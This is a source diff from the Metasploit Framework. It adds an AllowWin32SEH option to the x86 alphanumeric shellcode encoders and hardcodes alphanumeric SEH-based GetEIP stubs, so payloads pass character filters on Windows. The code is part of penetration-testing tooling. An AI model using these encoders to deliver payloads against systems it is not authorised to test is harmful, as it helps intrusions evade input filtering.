See #430. This adds the AllowWin32SEH option to the upper/mixed alphanumeric encoders, providing 100% alphanumeric payloads for Windows platforms

git-svn-id: file:///home/svn/framework3/trunk@7405 4d416f70-5f16-0410-b530-b9f4589650da

lib/msf/core/encoder/alphanum.rb

@@ -17,10 +17,12 @@ class Encoder::Alphanum < Msf::Encoder
 		register_options(
 			[
 				OptString.new('BufferRegister', [ false, "The register that pointers to the encoded payload" ]),
-				OptInt.new('BufferOffset', [ false, "The offset to the buffer from the start of the register", off ])
+				OptInt.new('BufferOffset', [ false, "The offset to the buffer from the start of the register", off ]),
+				OptBool.new('AllowWin32SEH', [ true, "Use SEH to determine the address of the stub (Windows only)", false ])
 			], Msf::Encoder::Alphanum)
 	end
-	
+
+end
+
 end
 
-end

modules/encoders/x86/alpha_mixed.rb

@@ -3,7 +3,7 @@
 ##
 
 ##
-# This file is part of the Metasploit Framework and may be subject to 
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -44,14 +44,22 @@ class Metasploit3 < Msf::Encoder::Alphanum
 		reg = datastore['BufferRegister']
 		off = (datastore['BufferOffset'] || 0).to_i
 		buf = ''
-		
+
 		# We need to create a GetEIP stub for the exploit
 		if (not reg)
-			res = Rex::Arch::X86.geteip_fpu(state.badchars)
-			if (not res)
-				raise RuntimeError, "Unable to generate geteip code"
-			end
+			if(datastore['AllowWin32SEH'])
+				buf = 'VTX630VXH49HHHPhYAAQhZYYYYAAQQDDDd36FFFFTXVj0PPTUPPa301089'
+				reg = 'ECX'
+				off = 0
+			else
+				res = Rex::Arch::X86.geteip_fpu(state.badchars)
+				if (not res)
+					raise RuntimeError, "Unable to generate geteip code"
+				end
 			buf, reg, off = res
+			end
+		else
+			reg.upcase!
 		end
 
 		buf + Rex::Encoder::Alpha2::AlphaMixed::gen_decoder(reg, off)
@@ -71,4 +79,5 @@ class Metasploit3 < Msf::Encoder::Alphanum
 	def encode_end(state)
 		state.encoded += Rex::Encoder::Alpha2::AlphaMixed::add_terminator()
 	end
-end
+end
+

modules/encoders/x86/alpha_upper.rb

@@ -3,7 +3,7 @@
 ##
 
 ##
-# This file is part of the Metasploit Framework and may be subject to 
+# This file is part of the Metasploit Framework and may be subject to
 # redistribution and commercial restrictions. Please see the Metasploit
 # Framework web site for more information on licensing and terms of use.
 # http://metasploit.com/framework/
@@ -44,14 +44,22 @@ class Metasploit3 < Msf::Encoder::Alphanum
 		reg = datastore['BufferRegister']
 		off = (datastore['BufferOffset'] || 0).to_i
 		buf = ''
-		
+
 		# We need to create a GetEIP stub for the exploit
 		if (not reg)
-			res = Rex::Arch::X86.geteip_fpu(state.badchars)
-			if (not res)
-				raise RuntimeError, "Unable to generate geteip code"
-			end
+			if(datastore['AllowWin32SEH'])
+				buf = 'VTX630WTX638VXH49HHHPVX5AAQQPVX5YYYYP5YYYD5KKYAPTTX638TDDNVDDX4Z4A63861816'
+				reg = 'ECX'
+				off = 0
+			else
+				res = Rex::Arch::X86.geteip_fpu(state.badchars)
+				if (not res)
+					raise RuntimeError, "Unable to generate geteip code"
+				end
 			buf, reg, off = res
+			end
+		else
+			reg.upcase!
 		end
 
 		buf + Rex::Encoder::Alpha2::AlphaUpper::gen_decoder(reg, off)
@@ -62,7 +70,7 @@ class Metasploit3 < Msf::Encoder::Alphanum
 	# payload.
 	#
 	def encode_block(state, block)
-		return Rex::Encoder::Alpha2::AlphaUpper::encode_byte(block.unpack('C')[0], state.badchars)        
+		return Rex::Encoder::Alpha2::AlphaUpper::encode_byte(block.unpack('C')[0], state.badchars)
 	end
 
 	#
@@ -71,4 +79,5 @@ class Metasploit3 < Msf::Encoder::Alphanum
 	def encode_end(state)
 		state.encoded += Rex::Encoder::Alpha2::AlphaUpper::add_terminator()
 	end
-end
+end
+